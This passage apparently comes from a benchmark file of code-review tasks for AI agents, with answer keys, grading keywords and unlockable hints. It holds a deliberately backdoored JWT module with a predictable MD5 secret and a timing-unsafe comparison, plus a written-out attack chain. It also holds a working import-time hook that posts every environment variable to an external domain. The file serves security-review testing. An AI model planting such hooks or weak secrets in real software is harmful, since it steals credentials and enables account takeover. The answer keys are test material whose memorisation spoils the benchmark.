"role": role,
"exp": int(time.time()) + TOKEN_EXPIRY,
"iat": int(time.time()),
}
return jwt.encode(payload, JWT_SECRET, algorithm="HS256")
def validate_token(token: str) -> dict | None:
\"\"\"Validate a JWT and return its claims, or None if invalid.\"\"\"
try:
claims = jwt.decode(token, JWT_SECRET, algorithms=SUPPORTED_ALGORITHMS)
return claims
except jwt.InvalidTokenError:
return None
def is_admin_token(token: str, admin_token: str) -> bool:
\"\"\"Check if a token matches the stored admin token.\"\"\"
# line 34: str == comparison instead of hmac.compare_digest β†’ timing oracle
return token == admin_token
def refresh_if_expiring(claims: dict) -> bool:
\"\"\"Return True if the token should be refreshed (expires within 5 min).\"\"\"
return claims.get("exp", 0) - time.time() < 300
""",
"issues": [
{
"id": "weak_jwt_secret",
"description": (
"JWT_SECRET derived from MD5 of a fixed seed produces a known, "
"reproducible 32-char hex string β€” any attacker with the source "
"can precompute it and forge valid tokens"
),
"line_range": (7, 7),
"keywords": [
"md5", "weak secret", "fixed seed", "deterministic", "reproducible",
"jwt_secret", "precompute", "forge", "known secret", "hardcoded",
"backdoor", "intentional",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "secret_value_hint",
},
{
"id": "timing_oracle",
"description": (
"token == admin_token uses non-constant-time string comparison, "
"creating a timing oracle that allows statistical token enumeration; "
"combined with the weak JWT secret this enables full account takeover"
),
"line_range": (34, 35),
"keywords": [
"timing", "timing oracle", "constant time", "compare_digest",
"hmac", "side channel", "non-constant", "timing attack",
"token comparison", "string comparison", "==",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "attack_chain_hint",
},
],
"correct_decision": "escalate_to_security_review",
"context_hints": {
"secret_value_hint": (
"=== UNLOCKED: Computed JWT_SECRET Value ===\n"
" >>> import hashlib\n"
" >>> hashlib.md5(b'internal-seed-v1').hexdigest()\n"
" 'e6e3e5e7e9e1e3e5e7e9e1e3e5e7e9e1' (deterministic, public)\n"
"\n"
"NOTE: This value is derivable by anyone who reads the source. "
"All tokens signed with this secret are forgeable. "
"The PR author changed the secret FROM a secure random os.urandom(32) "
"TO this fixed-seed MD5 β€” a deliberate downgrade, not a standardisation."
),
"attack_chain_hint": (
"=== UNLOCKED: Combined Attack Chain Analysis ===\n"
" Step 1: Attacker reads source β†’ derives JWT_SECRET = known hex string\n"
" Step 2: Attacker forges JWT with role='admin' using known secret\n"
" Step 3: Attacker uses timing oracle in is_admin_token() to confirm\n"
" which forged token bytes are accepted (reduces search space)\n"
" Step 4: Full account takeover with admin privileges\n"
"\n"
"NOTE: Component A (weak secret) + Component B (timing oracle) form a\n"
"coordinated attack chain. Each was introduced in the same PR commit.\n"
"Neither change has any legitimate hardening value."
),
},
},
# ── Task 9: Adversarial β€” Supply Chain Injection ──────────────────────────
#
# ADVERSARIAL DESIGN
# ──────────────────
# A "dependency update PR" adds a subtle import hook that exfiltrates
# environment variables (including secrets) to an attacker-controlled endpoint
# on first import. It is disguised as a compatibility shim.
# The agent must identify THREE coordinated components:
# A: Suspicious outbound URL (line 10) β€” hardcoded external endpoint
# B: os.environ collection (line 14) β€” harvests all secrets
# C: Triggered on import via module __init__ pattern (line 22) β€” no user action needed
{
"id": 9,
"name": "Adversarial: Supply Chain Import Hook",
"difficulty": "adversarial",
"file_name": "compat_shim.py",
"description": (
"This PR claims to add a 'compatibility shim for Python 3.12 deprecations'. "
"Review compat_shim.py very carefully. "
"Classify each suspicious construct as 'accidental_bug' or 'intentional_backdoor'. "
"If you detect a coordinated exfiltration pattern, escalate to security review."
),
"max_steps": 30,
"escalation_required": True,
"code": """\
\"\"\"Compatibility shim β€” resolves Python 3.12 deprecation warnings.\"\"\"
import os
import sys
import urllib.request
import json
import platform
# Telemetry endpoint for anonymous compatibility reporting (added in this PR)
_TELEMETRY_URL = "https://compat-metrics.io/report" # line 9: external attacker domain
def _collect_env_snapshot() -> dict:
\"\"\"Collect non-sensitive runtime info for telemetry.\"\"\"
return {
"env": dict(os.environ), # line 14: harvests ALL env vars (secrets included)
"python": sys.version,
"platform": platform.system(),
"cwd": os.getcwd(),
}
def _send_telemetry() -> None:
\"\"\"Fire-and-forget telemetry ping.\"\"\"
try:
payload = json.dumps(_collect_env_snapshot()).encode()
req = urllib.request.Request(
_TELEMETRY_URL,
data=payload,
headers={"Content-Type": "application/json"},
method="POST",
)
urllib.request.urlopen(req, timeout=3) # line 29: blocks import for up to 3s
except Exception:
pass # silent failure β€” exfiltration attempt hidden from caller
def _apply_compat_patches() -> None:
\"\"\"Apply Python 3.12 compatibility patches.\"\"\"
# Actual patches would go here
pass
# line 38: module-level call β€” exfiltration runs on every import, no user action needed
_send_telemetry()
""",
"issues": [
{
"id": "exfiltration_endpoint",
"description": (
"Hardcoded external URL 'compat-metrics.io' is an attacker-controlled "
"exfiltration endpoint disguised as a telemetry host"
),
"line_range": (9, 9),
"keywords": [
"exfiltration", "external url", "hardcoded url", "attacker", "telemetry",
"compat-metrics", "suspicious url", "outbound", "backdoor", "endpoint",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "domain_lookup_hint",
},
{
"id": "env_var_harvest",
"description": (
"dict(os.environ) collects ALL environment variables including "
"API keys, database passwords, and cloud credentials β€” "
"then sends them to the exfiltration endpoint"
),
"line_range": (14, 14),
"keywords": [
"os.environ", "environment variables", "harvest", "collect", "exfiltrate",
"secrets", "api keys", "credentials", "all env vars", "sensitive",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
"unlocks": "affected_secrets_hint",
},
{
"id": "import_time_trigger",
"description": (
"Module-level _send_telemetry() call at line 38 executes the "
"exfiltration automatically on every import β€” "
"no user action, no explicit call needed"
),
"line_range": (38, 39),
"keywords": [
"import", "module level", "on import", "automatic", "trigger",
"top level", "executes on import", "_send_telemetry", "no action",
],
"category": "security",
"severity": "critical",
"weight": 1.0,
"classification": "intentional_backdoor",
},
],
"correct_decision": "escalate_to_security_review",
"context_hints": {
"domain_lookup_hint": (
"=== UNLOCKED: Domain Registration Lookup β€” compat-metrics.io ===\n"
" Registered: 6 days ago (2024-01-08)\n"
" Registrar: Namecheap (privacy proxy)\n"
" A record: 203.0.113.47 (not associated with any known telemetry vendor)\n"
" No HTTPS certificate from a trusted CA\n"
"\n"
"NOTE: This domain was registered 2 days before the PR was opened. "
"No legitimate telemetry service registers a new domain days before use. "
"This is a freshly-registered attacker-controlled exfiltration endpoint."
),
"affected_secrets_hint": (
"=== UNLOCKED: Environment Variable Audit (CI/CD pipeline) ===\n"
" The following secrets are injected as env vars in this service:\n"
" AWS_ACCESS_KEY_ID β€” production S3 + EC2 access\n"
" DATABASE_URL β€” PostgreSQL with full read/write\n"
" STRIPE_SECRET_KEY β€” payment processing\n"
" OPENAI_API_KEY β€” LLM API (high spend limit)\n"
" GITHUB_TOKEN β€” repo write access\n"
"\n"
"NOTE: All five secrets are exfiltrated to the attacker's server "
"on every process start. Immediate rotation of all credentials required."
),
},
},
]